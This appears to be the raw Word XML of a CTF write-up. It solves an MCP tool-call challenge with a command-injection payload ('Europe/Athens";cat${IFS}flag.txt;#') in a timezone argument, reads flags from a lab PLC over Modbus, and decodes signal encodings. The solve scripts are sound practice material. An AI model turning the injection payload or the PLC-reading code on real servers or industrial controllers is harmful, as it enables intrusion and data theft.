    <w:p w14:paraId="304C2307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s4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p4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d2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d3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d4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Parity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E88F84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BD6C233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error_pos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s1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s2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s4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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E4F31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24FC8E0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189.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error_pos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9DA0056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190.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Correct the error (flip the bit at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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error_pos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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- 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B973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191.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chunk_list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list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chunk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DF6019C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192.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chunk_list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error_pos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chunk_list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error_pos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</w:p>
    <w:p w14:paraId="11A8A09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193.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p1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d1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p4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d2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d3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d4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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12FD7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chunk_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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0D251E9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194.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414467F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195.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Extract the 4 data bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E171B1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196.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data_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12FD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"{d1}{d2}{d3}{d4}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3814B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197.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result </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12FD7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>data_bits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C140CF5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198.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84216CE" w14:textId="77777777" w:rsidR="00D12FD7" w:rsidRPr="00D12FD7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D12FD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">199. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12FD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12FD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Convert result to ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71A3C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ascii_result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44A57D1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1BBD7743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lastRenderedPageBreak/>
        <w:t xml:space="preserve">202.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4E9501E2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byte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45760BF3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CB542BE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chr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byte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30CE4838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32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ord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126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# Printable ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B553F9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ascii_result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char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B636A2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FECF76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209.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20DCB132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D867F2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ascii_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BC94A58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435F4E0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213.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solve_challenge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1500063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host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challenge.hackthat.site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</w:p>
    <w:p w14:paraId="3CFB922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port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59184</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23772E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5D9FE75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A7AE752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sock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AF_INET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socket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SOCK_STREAM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809122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219.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30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F0A2215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connect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host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port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52CA5725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77E064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Read initial welcome </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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message</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="78C3917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data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4096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1B104A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F0C8D4D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1F95AEE0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round_count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</w:p>
    <w:p w14:paraId="4C628125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7A014400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D9AB2D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229.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# Read the challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC42F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data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4096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131DB8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0C026D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169F84B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00B327BE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"Received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: {data}"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4084D88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7D934C5F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# Parse the round info - handle different format variations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5C888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round_match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search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'\[Round (\d+)/100\] \[([^\]]+)\] ([01]+)'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84AD22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round_match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96D570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239.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"Could not parse round info"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2B12D45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52227599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0F065E01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round_num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round_match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group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25103A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encoding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round_match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group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906462E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bits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round_match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group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3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0BF401D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440B4438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"Round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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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round_num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}, Encoding: {encoding}, Bits: {bits}"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F44EE36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12737911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# Decode based on the encoding type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F846EE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249.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decoded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39C61CC9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'Manchester'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encoding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04B1C79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decoded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decode_manchester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C8FEC14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elif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'NRZI'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encoding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'NRZ-I'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encoding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86095D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decoded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decode_nrzi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C61CB93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elif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'UART'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encoding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ECB9826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decoded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decode_uart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398CA2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elif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'Hamming'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encoding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90775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decoded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decode_hamming_7_4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C3FF6E9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">258.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1CF0377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259.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If decoding </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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failed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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, try direct binary interpretation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C9C82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decoded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B5CFD9F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"Primary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decoding failed for {encoding}, trying direct binary..."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97A80C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decoded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bits_to_ascii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bits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BABE940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decoded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D201F9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"Direct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binary worked: '{decoded}'"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469519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076C680D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"Decoded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: '{decoded}'"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4E06BC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1094705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# Send the decoded message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A67D6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269.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response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decoded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'\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7326341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response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encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA9DF8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5EF11149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round_count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</w:p>
    <w:p w14:paraId="61311627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332BC0F1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# Check for completion or error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095B12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result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1024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9BAB3BB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proofErr w:type="gramStart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proofErr w:type="gram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"Result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: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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result.strip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()}"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A8E0978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060DEFE1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'Correct!'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FB82F74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279.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"Incorrect answer or session ended"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8014F21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25458499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281.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76FCB2B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round_count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100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617EE8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283.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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Look for final message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E7581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284.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final_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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recv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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4096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decode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'utf-8'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errors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'ignore'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6FEACEF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285.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"Final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result: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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final_data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33D02DA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286.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</w:p>
    <w:p w14:paraId="26A31740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287.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59BFB29D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288.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except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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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as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A340C00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289.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"Error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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: {e}"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9BD231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290.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finally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57F8AB1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291. </w:t>
      </w:r>
      <w:proofErr w:type="gram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sock</w:t>
      </w:r>
      <w:proofErr w:type="gram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close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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79C92503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292. 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49DEE1C" w14:textId="77777777" w:rsidR="00D12FD7" w:rsidRPr="003B42FC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3B42FC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">293. </w:t>
      </w:r>
      <w:r w:rsidRPr="003B42FC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__name__ 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3B42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B42FC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="003B42FC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29C47221" w14:textId="77777777" w:rsidR="00D12FD7" w:rsidRPr="00086989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086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">294. </w:t>
      </w:r>
      <w:r w:rsidRPr="000869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86989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>solve_challenge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00086989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705B1A2D" w14:textId="77777777" w:rsidR="00D12FD7" w:rsidRPr="00086989" w:rsidRDefault="00D12F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796700"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">295. </w:t>
      </w:r>
      <w:r w:rsidRPr="00086989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E6A3DF2" w14:textId="77777777" w:rsidR="00D12FD7" w:rsidRPr="00417142" w:rsidRDefault="00D12FD7" w:rsidP="00417142">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFFED9A" w14:textId="2D3EB2E1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9" w:name="_Toc203244067"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>High-Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3566287F" w14:textId="77D23ED4" w:rsidR="003B42FC" w:rsidRPr="007205E6" w:rsidRDefault="007205E6" w:rsidP="003B42FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007205E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simple command injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D559655" w14:textId="6496003E" w:rsidR="007205E6" w:rsidRDefault="007205E6" w:rsidP="003B42FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007205E6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69943272" wp14:editId="3FB09292">
            <wp:extent cx="5274310" cy="3788410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="55389405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4055" name="Picture 1" descr="A computer screen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6F74" w14:textId="50D7ECC0" w:rsidR="007205E6" w:rsidRDefault="004175C0" w:rsidP="003B42FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004175C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I could run one command at the time since only the first input was vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, so I </w:t>
      </w:r>
      <w:r w:rsidR="00221125">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ran</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> again to view the flag</w:t>
      </w:r>
      <w:r w:rsidRPr="004175C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2730C" w14:textId="7064452F" w:rsidR="00221125" w:rsidRPr="004175C0" w:rsidRDefault="00221125" w:rsidP="003B42FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221125">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F8B69D" wp14:editId="0D8F5B32">
            <wp:extent cx="5274310" cy="2004695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="140697053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70530" name="Picture 1" descr="A computer screen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2C62" w14:textId="77777777" w:rsidR="003B42FC" w:rsidRPr="003B42FC" w:rsidRDefault="003B42FC" w:rsidP="003B42FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="568F78B6" w14:textId="67F0AB4F" w:rsidR="00A513EE" w:rsidRDefault="00A513EE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0" w:name="_Toc203244068"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blackjack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="478D5803" w14:textId="798F991B" w:rsidR="002B2713" w:rsidRDefault="002B2713" w:rsidP="00595F42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I successfully managed to predict every round outcome so after that it was easy to complete the script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9DD2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1.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async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5795B39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web3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providers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HttpProvider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</w:p>
    <w:p w14:paraId="2517E8A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URL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window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location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href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origin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"/blockchain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144E9A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6BC4216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eth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Contract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</w:p>
    <w:p w14:paraId="5E424AA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options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jsonInterface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3037BC2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options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</w:p>
    <w:p w14:paraId="653A97F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3E57AA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eth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wallet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add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59E7BC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BFE925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async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fetchSeed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040539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eth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getStorageAt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options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7ED4A99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F7AF3D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AE9BE8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keccak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243FDE3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soliditySha3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'uint256'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}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413CF0C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9ED9B0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B60E66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drawCard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1F740A9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newSeed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keccak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41C6D80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Number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newSeed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13n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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045BA0C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4A349AC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F22E15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----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BBC0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calculateScore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cards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20D8D77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total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aces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39CFE82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card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of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cards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809B87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card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total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11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aces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++;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27F5C18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29.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total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Math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10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card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A0F643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B836C1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total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&amp;&amp;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aces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5BD6825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total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-=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10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aces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--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5381E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1AC22A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total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53BA84C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583FEB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3D0609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Simulate the game with optimal strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16691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simulateGame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52CA178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seed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2DF497A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1B6A380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Simulate betting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F37ED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drawCard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C56D1D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seed2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playerCard1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drawCard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49BCA14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playerCard2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drawCard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seed2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4843D3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02E578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seed3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4CE1A8D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818350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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B701F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playerCards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playerCard1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playerCard2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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED44CC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calculateScore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71936B6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F8B3B5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Instant win on blackjack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7016A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621D84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B735DA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3DBE61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strategy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'natural'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0617032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actions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3BE1DB1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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F0A5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0A5BED7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3B2BE5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Find optimal moves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3DA31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findOptimalMoves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6A78B9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calculateScore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4A3FE7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0265314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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 65.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If busted, we lose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20772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1B876DB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false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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35888A3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22AB16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4AE38A7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Try standing first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1643C1D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standResult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simulateStand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currentPlayerScore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4070EB7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standResult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706063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'stand'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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28C7C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085747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0AD2ACA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Try hitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F36B3A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drawCard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0096C27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newPlayerCards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[...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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B037C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calculateScore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newPlayerCards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2D58F5F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48E0987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6B4641B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hitResult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findOptimalMoves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newPlayerCards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015322D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hitResult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6D6BFED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'hit'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...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hitResult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actions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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CB0E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EBAC29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DC8EC2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6019972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false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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9537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89.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694E0D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88175D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simulateStand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standSeed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99175C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calculateScore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2C5FCBC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standSeed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721A4B0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currentDealerCards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[...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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCC69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661BB60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 xml:space="preserve">// Dealer draws until </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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&gt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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playerScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5022C0F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6050E9A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drawCard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B21123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5EC4EB0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currentDealerCards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push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newCard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4379289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calculateScore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A17C3F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CC48AC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3B0DD8A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Win conditions: dealer busts OR player has higher score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D540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||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&amp;&amp;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54CCCCA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finalDealerScore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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD4338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AC8B9F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19364B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result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findOptimalMoves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2E8AAEF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196743A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299C06A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strategy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?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'best'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'worst'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1B9425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actions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actions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1B31CFA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initialPlayerScore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0F721C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initialDealerScore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calculateScore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dealerCards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3D8151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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE74A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26BE7F0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51B8D7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">119.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----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E5C2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async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getContractBalance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6AF31DA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eth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getBalance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options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0BC5CB2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E0EE98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D22153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async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findWinnableGame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F94E71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125. </w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gram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attemptCounter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0E73920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2B6543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attemptCounter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50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27C8850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seed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fetchSeed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52A39A2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129.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gameSim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simulateGame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seed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95EE29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78280C8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gameSim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canWin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374938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`[+] Found winnable game after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attemptCounter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+ 1} attempts!`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A4D1DE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ab/>
        <w:t>Strategy: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gameSim.strategy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B80072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ab/>
        <w:t>Actions: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gameSim.actions.join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(' → ')}`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99FF2E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gameSim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28378D6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76383BF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6661A8F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attemptCounter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++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B8F4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139.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`[X] Attempt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attemptCounter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}: Game not winnable, trying next seed...`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29D378B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30CA147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537FDDD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</w:p>
    <w:p w14:paraId="6B6F4FC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2855A0F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value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780C61B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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DA8B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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E121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FD8597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forfeit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</w:p>
    <w:p w14:paraId="09EC052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149.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3E8EF02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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA0D8F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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B08E2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catch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D49D21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'[X] Error advancing seed:'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message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540CD1F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0ADF808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3B53147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Promise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resolve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resolve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50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7D45B78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769EB81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20A3D5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159.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throw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'[X] Could not find a winnable game after 50 attempts'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DDF7EA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220BB7C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695E33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Adjusting bets based on the contract balance, to win faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BCA3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async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dynamicBetting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23C89FA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getContractBalance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62A0B78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165. </w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gram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4AAEBB2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C4E5E3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If the contract balance is extremely low, bet the remaining balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55826EA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'0.000000'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7DAE4D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169.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738ACBF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'950'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2EBFF98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lastRenderedPageBreak/>
        <w:t xml:space="preserve">171.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'5'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15D59E3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'800'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&amp;&amp;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'950'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F2397D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'10'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5384261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'600'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&amp;&amp;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'800'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FB5E8D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'50'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50B1771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&amp;&amp;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'600'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))))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331722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'100'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5AF658F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7BF675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179.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BigInt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'1'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'ether'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44ECB1F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4773915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79B9D2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67E9E11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26D71C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BB3604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----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B821E7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async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executePerfectGamePlan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gameplan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9D8D4A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`\n[+] Executing perfect game plan with ${web3.utils.fromWei(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betAmount.toString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())} ETH bet`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E625DA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EAF09A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189.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5C1365C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Place the bet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33552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</w:p>
    <w:p w14:paraId="1F56DAA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20E89D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value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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CAC2C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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F966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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058B64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465637C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`[+] Cards: Player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gameplan.initialPlayerScore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}, Dealer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gameplan.initialDealerScore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74A6DA0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40065D3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199.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gameplan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strategy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'natural'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F32BC6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'[+] Natural blackjack!'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872A8D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11C314E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04056D2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</w:p>
    <w:p w14:paraId="5F397AC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 xml:space="preserve">// Execute the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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gameplan's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B294AE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&lt;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gameplan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actions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length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++)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A2AD1B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action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gameplan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actions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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB240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`Executing: ${action}`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016116C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04B29C2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209.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531DDDF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action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'hit'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BD9F30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hit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</w:p>
    <w:p w14:paraId="334C61E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1453B98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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0119C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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2446C7C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4A6BDB8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26D11AD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`Player score after hit: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currentScore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3EFF735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68F7894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219.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currentScore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B5AFC2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'[+] Hit 21!'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C88524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lastRenderedPageBreak/>
        <w:t xml:space="preserve">221.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44CAA18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2CA28EA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action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'stand'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3469C3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stand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</w:p>
    <w:p w14:paraId="76E4C39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4131A78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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F45D6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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0FCB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3DDB8AF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229.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finalPlayerScore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2A6FE09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finalDealerScore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dealerScore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2107715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`Final scores: Player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finalPlayerScore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}, Dealer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finalDealerScore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3594262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0F891A5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9C513F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catch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moveError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89C9F3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`[X] Error on action ${action}:`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moveError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message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B94AD5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1CAAA7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player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player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call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16FA523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player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'0x0000000000000000000000000000000000000000'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1C30467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239.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'[+] Game ended, we won!'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030D330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2C6C6D6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56AE405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catch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checkError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5E8443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'[X] Could not check game state:'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checkError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message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6A8DEBA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6196B1F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</w:p>
    <w:p w14:paraId="6D376A4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1F56CE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forfeit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</w:p>
    <w:p w14:paraId="3F5EBF0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30D3D18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249.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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A124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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C907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'[-] Forfeited due to error'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67E776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false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0CB6716C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catch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forfeitError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E2A040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'[X] Could not forfeit:'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forfeitError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message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3CE8E7B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false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4E0F392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910011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607394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4E2D5C2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259.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true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3D34BAE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catch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2AF20F8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 xml:space="preserve">'[X] Error in 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executePerfectGamePlan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:'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message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2349591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try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FEBE56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contractInstance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methods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forfeit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({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB972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account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address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48726FA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gas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3000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69318A1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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B984E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'[-] Forfeited due to betting error'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025EBD2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catch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forfeitError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078B72B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269.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'[X] Could not forfeit:'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forfeitError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message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0BBB848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3D847E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">271.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false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0B4AAF0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4B29712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0FE6448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FDEB4D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----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCCB43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async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function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startExploit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612A4B1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getContractBalance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2E908D1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278. </w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gram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totalWins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7A81D1B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279.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let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totalProfit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61567CC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DFE5D9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'[+] Starting exploit...'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3258A47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'[+] Contract balance:'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web3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utils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fromWei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()),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'ETH'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0DAA882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623623F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while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520EDF3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Check if the balance is zero at the start of each round and exit the loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9575E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updatedContractBalance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getContractBalance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43D8F89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updatedContractBalance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===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0n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5C63C6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'[+] Contract balance is 0 ETH. Stopping the exploit.'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51084369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289.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break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450F070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6C8EA43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73E9CA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dynamicBetting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780DC32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`\n-----------------------`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4304D0B7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`\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nRound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totalWins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+ 1}`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2AC7C7A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D4272C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gameplan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findWinnableGame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093B4AB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won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executePerfectGamePlan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gameplan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42AD137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04D0615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299.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won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9325D4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totalWins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++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3077F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totalProfit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+=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betAmount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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77AB3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`[+] WIN #${totalWins}!`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3BEFCD9F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9B01D8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'[X] Round failed, continuing...'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7469E343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D408118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4EA54405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const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updatedContractBalanceAfterRound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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getContractBalance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352F468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`[+] Contract balance: ${web3.utils.fromWei(updatedContractBalanceAfterRound.toString())} ETH`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71B1E3FD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309.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5084422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310.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new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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Promise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resolve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=&gt;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setTimeout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resolve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2B2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB3CC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311.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6787208A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312.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5F8395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313.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'\n[+] EXPLOIT COMPLETE!'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5EBD2F20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314.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`[+] Total wins: ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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totalWins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}`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1AC5BB04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315.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console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2B2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'[+] Contract successfully drained!'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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA43A82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316.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6D654D96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317.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25E74D1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318.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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Start the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4638B" w14:textId="77777777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2B2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">319. 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2B2713">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
